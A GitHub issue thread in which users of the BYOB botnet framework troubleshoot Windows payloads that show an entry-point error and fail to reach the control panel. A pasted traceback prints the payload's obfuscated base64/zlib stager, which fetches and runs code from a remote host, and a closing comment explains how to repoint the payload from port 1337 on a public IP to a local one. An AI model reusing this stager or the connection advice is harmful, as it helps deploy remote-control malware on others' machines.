### ISSUE TITLE
the procedure entry point could not be located in the dynamic library

### ISSUE THREAD

**Issue by zarnackwizard** [malwaredllc/byob#516]
when I
![issue](https://user-images.githubusercontent.com/78225195/139165629-dc5f3389-7414-482e-8800-b9af261c4bd4.PNG)

 run the exe version of the payload there is an error when I run it on windows 10 and apparently its referring to ht eucrtbase.dll in my temp folder and I tried running it as admin but nothing worked and I also tried to use the python version of the payload but its throwing tons of errors when I run the python script. so basically I can not create any payloads can anyone help me

**Comment by fireFerry** [comment]
This is a popup you can just click OK on and ignore. Can you try running the python payload from a terminal and showing the output?

**Comment by gushteranin** [comment]
I have the same problem. Same mistake.
After i click OK payload load everything else, but i cannot see the target machine. Does not show up on the Control Panel.
So i create the payload on ubuntu 20.04 i installed it with VRL, The windows and linux machine are at the same network. 192.168.100.48 the ubuntu 192.168.100.50 the windows. Install windows payload on the windows machine, but 0 bots.
Any help will be great.
I am not post that as an issue i just looking for help.

**Comment by fireFerry** [comment]
For help, please join the discord server: https://discord.io/byob

**Comment by gushteranin** [comment]
fireFerry, i already try that. i got banned for a single quesstion. Not even hard one. I just ask if you offer payed variant on this and you banned me for that.
Most pf programs or scripts have free and payd versions. i just ask that. And i got banned for it.

**Comment by fireFerry** [comment]
I'm fairly sure that was not the only reason for your ban, but if you [appeal](https://forms.gle/zc24mW1zfasR2zZV8), we will look into your punishment again.

**Comment by gushteranin** [comment]
No need for appeal. Anyway i do not bother you guys with questions. 
The reason i write here, is that i have the same problem. I cannot see the infected machine. I got same mistake as zarnackwizard and i was thinking that is the problem. My opinion is you guys should make payd version with support. For me is more eazy to pay and see a problem solved. Or maybe payd support only. Kind Regards

**Comment by fireFerry** [comment]
Why would we limit support to paying people only? Byob is an open-source project, the source-code is available to everyone, so naturally we also help everyone, there's no aim for profit.

**Comment by nikoli0218** [comment]
Did anyone ever figure out why its throwing this error

**Comment by nikoli0218** [comment]
My error just says entry point can not be found runs the exe and exits with no "bots" on the control panel

**Comment by gushteranin** [comment]
You ask what eerror terminal show..
Here what i get:

C:\PY>python byob_uO5.py
Traceback (most recent call last):
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 1354, in do_open
    h.request(req.get_method(), req.selector, req.data, headers,
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python38\lib\http\client.py", line 1252, in request
    self._send_request(method, url, body, headers, encode_chunked)
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python38\lib\http\client.py", line 1298, in _send_request
    self.endheaders(body, encode_chunked=encode_chunked)
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python38\lib\http\client.py", line 1247, in endheaders
    self._send_output(message_body, encode_chunked=encode_chunked)
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python38\lib\http\client.py", line 1007, in _send_output
    self.send(msg)
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python38\lib\http\client.py", line 947, in send
    self.connect()
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python38\lib\http\client.py", line 918, in connect
    self.sock = self._create_connection(
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python38\lib\socket.py", line 808, in create_connection
    raise err
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python38\lib\socket.py", line 796, in create_connection
    sock.connect(sa)
TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "byob_uO5.py", line 5, in <module>
    exec(eval(marshal.loads(zlib.decompress(base64.b64decode(b'eJwrtWZgYCgtyskvSM3TUM8oKSmw0te3MNczNDLUMzQz1zM2sjI0NrbQ1y8uSUxPLSrWL/U31SuoVNfUK0pNTNHQBAA9eBH3')))))
  File "<string>", line 1, in <module>
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 222, in urlopen
    return opener.open(url, data, timeout)
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 525, in open
    response = self._open(req, data)
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 542, in _open
    result = self._call_chain(self.handle_open, protocol, protocol +
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 502, in _call_chain
    result = func(*args)
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 1383, in http_open
    return self.do_open(http.client.HTTPConnection, req)
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 1357, in do_open
    raise URLError(err)
urllib.error.URLError: <urlopen error [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond>

C:\PY>

**Comment by BlueCute** [comment]
I the problem is not on BYOB part, it was network issue.

The payload always try to connect to the host on public ip with port 1337.
After editing python payload i was able to connect it to local ip.
